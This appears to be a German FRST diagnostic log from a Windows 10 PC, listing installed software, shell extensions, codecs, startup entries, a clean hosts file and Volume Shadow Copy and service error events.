(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9120 - Adobe Systems Inc.)
Adobe Connect (HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\Adobe Connect App) (Version: 2020.1.5.32 - Adobe Systems Inc.)
Adobe Photoshop CS5 (HKLM-x32\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated)
Age of Empires III: ESO-Community Patch (HKLM\...\ESO Community Patch_is1) (Version: 8.2.2.0 - ESO Community)
BandLab Assistant 5.2.0 (HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\{9b08bea4-021c-5f9d-a74e-ac0ceb51fb28}) (Version: 5.2.0 - BandLab)
Cakewalk by BandLab (HKLM\...\Cakewalk Core_is1) (Version: 26.05.0.039 - BandLab Singapore Pte Ltd.)
Cakewalk Studio Instruments Suite (HKLM\...\Studio Instruments Suite_is1) (Version: 1.0.0.70 - BandLab Singapore Pte Ltd.)
Cisco Webex Meetings (HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\ActiveTouchMeetingClient) (Version: 41.1.2 - Cisco Webex LLC)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Die Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.69.43.024017 - Electronic Arts Inc.)
Die Sims™ 3 Late Night (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}_The Sims 3 Late Night) (Version: 1.0.0.0 - Electronic Arts Inc.)
Diercke Atlas (HKLM-x32\...\Diercke Atlas) (Version: 2.6.0.26121 - westermann digital GmbH)
Diercke Globus Online 4 (HKLM-x32\...\Diercke Globus Online 4) (Version: 4.4.0.67 - Bildungshaus Schulbuchverlage Westermann Schroedel Diesterweg Schöningh Winklers GmbH)
Dropbox (HKLM-x32\...\Dropbox) (Version: 115.4.601 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.415.1 - Dropbox, Inc.) Hidden
Fotogalerie (HKLM-x32\...\{41BF4A3B-D60A-4E92-883F-C88C8C157261}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
fx-9860GII Series OS Update (HKLM-x32\...\{2A249985-ABB6-4B16-B737-715FCB4FA048}) (Version: 2.11.0000 - CASIO COMPUTER CO., LTD.)
GeoGebra Classic (HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\GeoGebra_6) (Version: 6.0.620 - International GeoGebra Institute)
GeoGebra Graphing (HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\GeoGebra_Graphing) (Version: 6.0.536 - International GeoGebra Institute)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 88.0.4324.146 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6293 - Intel Corporation)
Malwarebytes version 4.3.0.98 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.3.0.98 - Malwarebytes)
Melodyne Runtime 4.1 (x64) (HKLM\...\{721E4E34-AF7C-4345-93F9-282CCC8CCCB5}) (Version: 1.0.2 - Celemony Software GmbH)
Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13628.20274 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 88.0.705.56 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft OneDrive (HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\OneDriveSetup.exe) (Version: 21.002.0104.0005 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{143E35D3-F0A4-4E90-96C9-B1B72F11343A}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{70C91B91-61E8-4D06-86D6-A9DCC291983A}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13628.20274 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13628.20274 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13628.20274 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13628.20274 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 10.5.91.46291 - Electronic Arts, Inc.)
paint.net (HKLM\...\{6FED3D93-C0FA-4BD7-A36F-7FC53698244F}) (Version: 4.2.15 - dotPDN LLC)
PDF Settings CS5 (HKLM-x32\...\{A78FE97A-C0C8-49CE-89D0-EDD524A17392}) (Version: 10.0 - Adobe Systems Incorporated) Hidden
Pixum Fotowelt (HKLM-x32\...\Pixum Fotowelt) (Version: 7.0.4 - CEWE Stiftung u Co. KGaA)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31233 - Realtek Semiconductor Corp.)
Spitfire Audio (HKLM-x32\...\{ABC5F486-25BD-4BAA-9FA1-A84152CBB563}_is1) (Version: 3.2.6 - Spitfire Audio Holdings Ltd)
Spotify (HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\Spotify) (Version: 1.1.51.382.g8e3b11ed - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F14FB68A-9188-4036-AD0D-D054BC9C9291}) (Version: 2.59.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\ZoomUMX) (Version: 5.4.6 (59296.1207) - Zoom Video Communications, Inc.)
Packages:
=========
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-10-02] (Microsoft Corporation)
Free File Viewers -> C:\Program Files\WindowsApps\D5BE6627.FileViewerFinder_4.1.1.0_x86__9pm2v9747qaaa [2020-09-19] (CompuClever Systems Inc.)
Fresh Paint -> C:\Program Files\WindowsApps\Microsoft.FreshPaint_3.1.10383.1000_x86__8wekyb3d8bbwe [2019-06-10] (Microsoft Corporation)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_122.2.830.0_x64__v10z8vjag6ke6 [2021-02-04] (HP Inc.)
Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.2.0_neutral__8xx8rvfyw5nnt [2020-03-06] (Instagram)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-03-04] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad]
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.1.137.0_x64__dt26b99r8h8gj [2019-10-26] (Realtek Semiconductor Corp)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-570092518-3918108528-2642111008-1001_Classes\CLSID\{1019ADC7-17CB-4489-AFD5-6642C7400ACE}\localserver32 -> C:\Users\richa\AppData\Local\Webex\Webex\Applications\ptOIEx64.exe (Cisco WebEx LLC -> Cisco WebEx LLC)
CustomCLSID: HKU\S-1-5-21-570092518-3918108528-2642111008-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\richa\Dropbox [2019-03-24 10:13]
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-02-05] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.46.0.dll [2020-10-06] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-02-05] (Malwarebytes Corporation -> Malwarebytes)
==================== Codecs (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2015-04-14] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2015-04-14] (Electronic Arts -> On2.com)
==================== Verknüpfungen & WMI ========================
==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-02-03] (Microsoft Corporation -> Microsoft Corporation)
==================== Hosts Inhalt: =========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2017-03-18 22:03 - 2021-02-05 11:27 - 000000027 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost
2018-10-16 13:42 - 2018-10-16 17:48 - 000000446 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics
==================== Andere Bereiche ===========================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\richa\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\design ohne titel (6).png
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
HKLM\...\StartupApproved\Run32: => "AdobeCS5ServiceManager"
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-570092518-3918108528-2642111008-1001\...\StartupApproved\Run: => "BandLab Assistant.app"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Wiederherstellungspunkte =========================
==================== Fehlerhafte Geräte im Gerätemanager ============
==================== Fehlereinträge in der Ereignisanzeige: ========================
Applikationsfehler:
==================
Error: (02/05/2021 11:41:44 AM) (Source: VSS) (EventID: 12292) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Erstellen der Schattenkopieanbieter-COM-Klasse mit CLSID {3e02620c-e180-44f3-b154-2473646e4cb8} [0x80040154, Klasse nicht registriert
] ist ein Fehler aufgetreten.
Vorgang:
Für diesen Anbieter eine aufrufbare Schnittstelle abrufen
Schnittstellen für alle Anbieter auflisten, die diesen Kontext unterstützen
Schattenkopien löschen
Kontext:
Anbieter-ID: {74600e39-7dc5-4567-a03b-f091d6c7b092}
Klassen-ID: {3e02620c-e180-44f3-b154-2473646e4cb8}
Snapshotkontext: -1
Snapshotkontext: -1
Ausführungskontext: Coordinator
Error: (02/05/2021 11:41:44 AM) (Source: VSS) (EventID: 22) (User: )
Description: Fehler im Volumenschattenkopie-Dienst: Eine vom Volumenschattenkopie-Dienst benötigte kritische Komponente ist nicht registriert.
Dies kann geschehen, wenn bei der Windows-Installation oder bei der Installation eines Schattenkopieanbieters ein Fehler aufgetreten ist.
Der von CoCreateInstance für die Klasse mit CLSID "{3e02620c-e180-44f3-b154-2473646e4cb8}" und dem Namen "SW_PROV" zurückgegebene Fehler ist [0x80040154, Klasse nicht registriert
].
Vorgang:
Für diesen Anbieter eine aufrufbare Schnittstelle abrufen
Schnittstellen für alle Anbieter auflisten, die diesen Kontext unterstützen
Schattenkopien löschen
Kontext:
Anbieter-ID: {74600e39-7dc5-4567-a03b-f091d6c7b092}
Klassen-ID: {3e02620c-e180-44f3-b154-2473646e4cb8}
Snapshotkontext: -1
Snapshotkontext: -1
Ausführungskontext: Coordinator
Error: (02/05/2021 11:41:44 AM) (Source: VSS) (EventID: 12292) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Erstellen der Schattenkopieanbieter-COM-Klasse mit CLSID {3e02620c-e180-44f3-b154-2473646e4cb8} [0x80040154, Klasse nicht registriert
] ist ein Fehler aufgetreten.
Vorgang:
Für diesen Anbieter eine aufrufbare Schnittstelle abrufen
Schnittstellen für alle Anbieter auflisten, die diesen Kontext unterstützen
Eigenschaften der Schattenkopie abrufen
Schattenkopien löschen
Kontext:
Anbieter-ID: {74600e39-7dc5-4567-a03b-f091d6c7b092}
Klassen-ID: {3e02620c-e180-44f3-b154-2473646e4cb8}
Snapshotkontext: -1
Snapshotkontext: -1
Ausführungskontext: Coordinator
Ausführungskontext: Coordinator
Error: (02/05/2021 11:41:44 AM) (Source: VSS) (EventID: 22) (User: )
Description: Fehler im Volumenschattenkopie-Dienst: Eine vom Volumenschattenkopie-Dienst benötigte kritische Komponente ist nicht registriert.
Dies kann geschehen, wenn bei der Windows-Installation oder bei der Installation eines Schattenkopieanbieters ein Fehler aufgetreten ist.
Der von CoCreateInstance für die Klasse mit CLSID "{3e02620c-e180-44f3-b154-2473646e4cb8}" und dem Namen "SW_PROV" zurückgegebene Fehler ist [0x80040154, Klasse nicht registriert
].
Vorgang:
Für diesen Anbieter eine aufrufbare Schnittstelle abrufen
Schnittstellen für alle Anbieter auflisten, die diesen Kontext unterstützen
Eigenschaften der Schattenkopie abrufen
Schattenkopien löschen
Kontext:
Anbieter-ID: {74600e39-7dc5-4567-a03b-f091d6c7b092}
Klassen-ID: {3e02620c-e180-44f3-b154-2473646e4cb8}
Snapshotkontext: -1
Snapshotkontext: -1
Ausführungskontext: Coordinator
Ausführungskontext: Coordinator
Error: (02/05/2021 11:41:44 AM) (Source: VSS) (EventID: 12292) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Erstellen der Schattenkopieanbieter-COM-Klasse mit CLSID {3e02620c-e180-44f3-b154-2473646e4cb8} [0x80040154, Klasse nicht registriert
] ist ein Fehler aufgetreten.
Vorgang:
Für diesen Anbieter eine aufrufbare Schnittstelle abrufen
Schnittstellen für alle Anbieter auflisten, die diesen Kontext unterstützen
Schattenkopien abfragen
Kontext:
Anbieter-ID: {74600e39-7dc5-4567-a03b-f091d6c7b092}
Klassen-ID: {3e02620c-e180-44f3-b154-2473646e4cb8}
Snapshotkontext: -1
Snapshotkontext: -1
Ausführungskontext: Coordinator
Error: (02/05/2021 11:41:44 AM) (Source: VSS) (EventID: 22) (User: )
Description: Fehler im Volumenschattenkopie-Dienst: Eine vom Volumenschattenkopie-Dienst benötigte kritische Komponente ist nicht registriert.
Dies kann geschehen, wenn bei der Windows-Installation oder bei der Installation eines Schattenkopieanbieters ein Fehler aufgetreten ist.
Der von CoCreateInstance für die Klasse mit CLSID "{3e02620c-e180-44f3-b154-2473646e4cb8}" und dem Namen "SW_PROV" zurückgegebene Fehler ist [0x80040154, Klasse nicht registriert
].
Vorgang:
Für diesen Anbieter eine aufrufbare Schnittstelle abrufen
Schnittstellen für alle Anbieter auflisten, die diesen Kontext unterstützen
Schattenkopien abfragen
Kontext:
Anbieter-ID: {74600e39-7dc5-4567-a03b-f091d6c7b092}
Klassen-ID: {3e02620c-e180-44f3-b154-2473646e4cb8}
Snapshotkontext: -1
Snapshotkontext: -1
Ausführungskontext: Coordinator
Error: (02/05/2021 11:41:43 AM) (Source: VSS) (EventID: 12292) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Erstellen der Schattenkopieanbieter-COM-Klasse mit CLSID {3e02620c-e180-44f3-b154-2473646e4cb8} [0x80040154, Klasse nicht registriert
] ist ein Fehler aufgetreten.
Vorgang:
Für diesen Anbieter eine aufrufbare Schnittstelle abrufen
Schnittstellen für alle Anbieter auflisten, die diesen Kontext unterstützen
Schattenkopien abfragen
Kontext:
Anbieter-ID: {74600e39-7dc5-4567-a03b-f091d6c7b092}
Klassen-ID: {3e02620c-e180-44f3-b154-2473646e4cb8}
Snapshotkontext: -1
Snapshotkontext: -1
Ausführungskontext: Coordinator
Error: (02/05/2021 11:41:43 AM) (Source: VSS) (EventID: 22) (User: )
Description: Fehler im Volumenschattenkopie-Dienst: Eine vom Volumenschattenkopie-Dienst benötigte kritische Komponente ist nicht registriert.
Dies kann geschehen, wenn bei der Windows-Installation oder bei der Installation eines Schattenkopieanbieters ein Fehler aufgetreten ist.
Der von CoCreateInstance für die Klasse mit CLSID "{3e02620c-e180-44f3-b154-2473646e4cb8}" und dem Namen "SW_PROV" zurückgegebene Fehler ist [0x80040154, Klasse nicht registriert
].
Vorgang:
Für diesen Anbieter eine aufrufbare Schnittstelle abrufen
Schnittstellen für alle Anbieter auflisten, die diesen Kontext unterstützen
Schattenkopien abfragen
Kontext:
Anbieter-ID: {74600e39-7dc5-4567-a03b-f091d6c7b092}
Klassen-ID: {3e02620c-e180-44f3-b154-2473646e4cb8}
Snapshotkontext: -1
Snapshotkontext: -1
Ausführungskontext: Coordinator
Systemfehler:
=============
Error: (02/05/2021 11:40:08 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Origin Web Helper Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (02/05/2021 11:40:08 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Modules Installer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (02/05/2021 11:40:08 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Content Protection HECI Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (02/05/2021 11:40:08 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "DbxSvc" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 5000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (02/05/2021 11:40:08 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Surface Integration Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (02/05/2021 11:40:07 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Microsoft Office Click-to-Run Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts.
